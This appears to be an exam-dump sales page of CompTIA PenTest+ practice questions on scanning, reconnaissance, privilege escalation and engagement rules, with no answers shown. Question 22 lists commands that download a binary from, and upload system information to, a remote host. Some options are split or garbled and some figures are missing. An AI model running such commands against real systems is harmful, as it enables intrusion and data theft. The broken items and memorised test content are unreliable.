Summer Sale - Special Limited Time 55% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 44314956B5

Good News !!! PT0-002 CompTIA PenTest+ Certification Exam is now Stable and With Pass Result

PT0-002 Practice Exam Questions and Answers

CompTIA PenTest+ Certification Exam

Last Update 6 days ago
Total Questions : 376

PT0-002 is stable now with all latest exam questions are added 6 days ago. Just download our Full package and start your journey with CompTIA PenTest+ Certification Exam certification. All these CompTIA PT0-002 practice exam questions are real and verified by our Experts in the related industry fields.

PT0-002 PDF

PT0-002 PDF (Printable)
$54
$119.99

PT0-002 Testing Engine

PT0-002 PDF (Printable)
$63
$139.99

PT0-002 PDF + Testing Engine

PT0-002 PDF (Printable)
$79.65
$176.99
Question # 1

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Options:

A.  

Perform forensic analysis to isolate the means of compromise and determine attribution.

B.  

Incorporate the newly identified method of compromise into the red team’s approach.

C.  

Create a detailed document of findings before continuing with the assessment.

D.  

Halt the assessment and follow the reporting procedures as outlined in the contract.

Discussion 0
Question # 2

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

Options:

A.  

Specially craft and deploy phishing emails to key company leaders.

B.  

Run a vulnerability scan against the company's external website.

C.  

Runtime the company's vendor/supply chain.

D.  

Scrape web presences and social-networking sites.

Discussion 0
Question # 3

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

  • Have a full TCP connection
  • Send a “hello” payload
  • Walt for a response
  • Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Options:

A.  

Run nmap –Pn –sV –script vuln .

B.  

Employ an OpenVAS simple scan against the TCP port of the host.

C.  

Create a script in the Lua language and use it with NS

E.  

D.  

Perform a credentialed scan with Nessus.

Discussion 0
Question # 4

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A.  

/var/log/messages

B.  

/var/log/last_user

C.  

/var/log/user_log

D.  

/var/log/lastlog

Discussion 0
Question # 5

Which of the following is the MOST effective person to validate results from a penetration test?

Options:

A.  

Third party

B.  

Team leader

C.  

Chief Information Officer

D.  

Client

Discussion 0
Question # 6

Given the following code:

Question # 6

Which of the following data structures is systems?

Options:

A.  

A tuple

B.  

A tree

C.  

An array

D.  

A dictionary

Discussion 0
Question # 7

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

Options:

A.  

SOW.

B.  

SL

A.  

C.  

RO

E.  

D.  

NDA

Discussion 0
Question # 8

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Options:

A.  

Peach

B.  

WinDbg

C.  

GDB

D.  

OllyDbg

Discussion 0
Question # 9

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

Options:

A.  

Mask

B.  

Rainbow

C.  

Dictionary

D.  

Password spraying

Discussion 0
Question # 10

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Options:

A.  

Website scraping

B.  

Website cloning

C.  

Domain enumeration

D.  

URL enumeration

Discussion 0
Question # 11

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

Options:

A.  

Weekly

B.  

Monthly

C.  

Quarterly

D.  

Annually

Discussion 0
Question # 12

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

Options:

A.  

The company that requested the penetration test

B.  

The penetration testing company

C.  

The target host's owner

D.  

The penetration tester

E.  

The subcontractor supporting the test

Discussion 0
Question # 13

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

Options:

A.  

Nmap -s 445 -Pn -T5 172.21.0.0/16

B.  

Nmap -p 445 -n -T4 -open 172.21.0.0/16

C.  

Nmap -sV --script=smb* 172.21.0.0/16

D.  

Nmap -p 445 -max -sT 172. 21.0.0/16

Discussion 0
Question # 14

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Options:

A.  

Nessus

B.  

Metasploit

C.  

Burp Suite

D.  

Ethercap

Discussion 0
Question # 15

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A.  

Executive summary of the penetration-testing methods used

B.  

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.  

Quantitative impact assessments given a successful software compromise

D.  

Code context for instances of unsafe type-casting operations

Discussion 0
Question # 16

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Options:

A.  

Pick a lock.

B.  

Disable the cameras remotely.

C.  

Impersonate a package delivery worker.

D.  

Send a phishing email.

Discussion 0
Question # 17

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A.  

Open-source research

B.  

A ping sweep

C.  

Traffic sniffing

D.  

Port knocking

E.  

A vulnerability scan

F.  

An Nmap scan

Discussion 0
Question # 18

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

Options:

A.  

Executive summary

B.  

Remediation

C.  

Methodology

D.  

Metrics and measures

Discussion 0
Question # 19

A penetration tester runs the following command on a system:

find / -user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A.  

Set the SGID on all files in the / directory

B.  

Find the /root directory on the system

C.  

Find files with the SUID bit set

D.  

Find files that were created during exploitation and move them to /dev/null

Discussion 0
Question # 20

A penetration tester is attempting to discover live hosts on a subnet quickly.

Which of the following commands will perform a ping scan?

Options:

A.  

nmap -sn 10.12.1.0/24

B.  

nmap -sV -A 10.12.1.0/24

C.  

nmap -Pn 10.12.1.0/24

D.  

nmap -sT -p- 10.12.1.0/24

Discussion 0
Question # 21

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Options:

A.  

Run nmap with the –o, -p22, and –sC options set against the target

B.  

Run nmap with the –sV and –p22 options set against the target

C.  

Run nmap with the --script vulners option set against the target

D.  

Run nmap with the –sA option set against the target

Discussion 0
Question # 22

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Options:

A.  

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.  

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.  

schtasks /query /fo LIST /v | find /I “Next Run Time:”

D.  

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Discussion 0
Question # 23

A penetration tester writes the following script:

Question # 23

Which of the following is the tester performing?

Options:

A.  

Searching for service vulnerabilities

B.  

Trying to recover a lost bind shell

C.  

Building a reverse shell listening on specified ports

D.  

Scanning a network for specific open ports

Discussion 0
Question # 24

A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

Options:

A.  

Cost ofthe assessment

B.  

Report distribution

C.  

Testing restrictions

D.  

Liability

Discussion 0
Question # 25

The results of an Nmap scan are as follows:

Question # 25

Which of the following would be the BEST conclusion about this device?

Options:

A.  

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

B.  

This device is most likely a gateway with in-band management services.

C.  

This device is most likely a proxy server forwarding requests over TCP/443.

D.  

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Discussion 0
Question # 26

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Options:

A.  

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

B.  

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the

engagement

C.  

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

D.  

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

E.  

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

F.  

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Discussion 0
Question # 27

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?

Options:

A.  

Terminate the contract.

B.  

Update the ROE with new signatures. Most Voted

C.  

Scan the 8-bit block to map additional missed hosts.

D.  

Continue the assessment.

Discussion 0
Question # 28

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

Options:

A.  

Multiple handshakes

B.  

IP addresses

C.  

Encrypted file transfers

D.  

User hashes sent over SMB

Discussion 0
Question # 29

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

Options:

A.  

Cross-site request forgery

B.  

Server-side request forgery

C.  

Remote file inclusion

D.  

Local file inclusion

Discussion 0
Question # 30

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

Options:

A.  

John the Ripper

B.  

Hydra

C.  

Mimikatz

D.  

Cain and Abel

Discussion 0
Question # 31

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Options:

A.  

Utilize the tunnel as a means of pivoting to other internal devices.

B.  

Disregard the IP range, as it is out of scope.

C.  

Stop the assessment and inform the emergency contact.

D.  

Scan the IP range for additional systems to exploit.

Discussion 0
Question # 32

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

Options:

A.  

As backup in case the original documents are lost

B.  

To guide them through the building entrances

C.  

To validate the billing information with the client

D.  

As proof in case they are discovered

Discussion 0
Question # 33

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

Options:

A.  

The IP address is wrong.

B.  

The server is unreachable.

C.  

The IP address is on the blocklist.

D.  

The IP address is on the allow list.

Discussion 0
Question # 34

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

Options:

A.  

Command injection

B.  

Broken authentication

C.  

Direct object reference

D.  

Cross-site scripting

Discussion 0
Question # 35

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

Options:

A.  

VRFY and EXPN

B.  

VRFY and TURN

C.  

EXPN and TURN

D.  

RCPT TO and VRFY

Discussion 0
Question # 36

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

Options:

A.  

Partially known environment testing

B.  

Known environment testing

C.  

Unknown environment testing

D.  

Physical environment testing

Discussion 0
Question # 37

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

Options:

A.  

nmap -"T3 192.168.0.1

B.  

nmap - "P0 192.168.0.1

C.  

nmap - T0 192.168.0.1

D.  

nmap - A 192.168.0.1

Discussion 0
Question # 38

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

Options:

A.  

SQLmap

B.  

Nessus

C.  

Nikto

D.  

DirBuster

Discussion 0
Question # 39

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Options:

A.  

Buffer overflows

B.  

Cross-site scripting

C.  

Race-condition attacks

D.  

Zero-day attacks

E.  

Injection flaws

F.  

Ransomware attacks

Discussion 0
Question # 40

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

Options:

A.  

HTTPS communication

B.  

Public and private keys

C.  

Password encryption

D.  

Sessions and cookies

Discussion 0
Question # 41

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

Options:

A.  

tcpdump

B.  

Snort

C.  

Nmap

D.  

Netstat

E.  

Fuzzer

Discussion 0
Get PT0-002 dumps and pass your exam in 24 hours!

Free Exams Sample Questions